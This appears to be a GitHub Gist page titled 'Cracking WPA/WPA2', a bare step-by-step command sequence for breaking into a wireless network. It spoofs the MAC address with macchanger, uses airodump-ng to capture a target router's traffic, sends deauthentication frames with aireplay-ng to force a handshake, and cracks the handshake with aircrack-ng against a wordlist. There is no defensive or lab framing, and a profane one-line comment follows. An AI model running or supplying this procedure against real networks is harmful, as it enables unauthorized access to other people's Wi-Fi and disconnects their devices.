Created
December 21, 2012 17:41
-
-
Save mouseroot/4354355 to your computer and use it in GitHub Desktop.
Cracking WPA/WPA2
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| apt-get install aircrack-ng | |
| apt-get install macchanger | |
| ifconfig <interface> down | |
| macchanger -s 00:00:13:37:00:00 <interface> | |
| airmon-ng start <interface> | |
| ifconfig <interface> up | |
| airodump-ng <interface> | |
| ...let it populate | |
| ^c | |
| airodump-ng -c <channel> -w <file to write to> --bssid <router MAC> | |
| ...spawn another console/tab | |
| aireplay-ng -0 <number of times(1)> -e <Router name> <interface> | |
| ...wait for the handshake | |
| ...once you get a handshake stop airodump-ng(we no longer need it) | |
| aircrack-ng -w <path to wordlist> <file with dumped data> | |
| ...sit back and watch it do its thing! |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
fuck u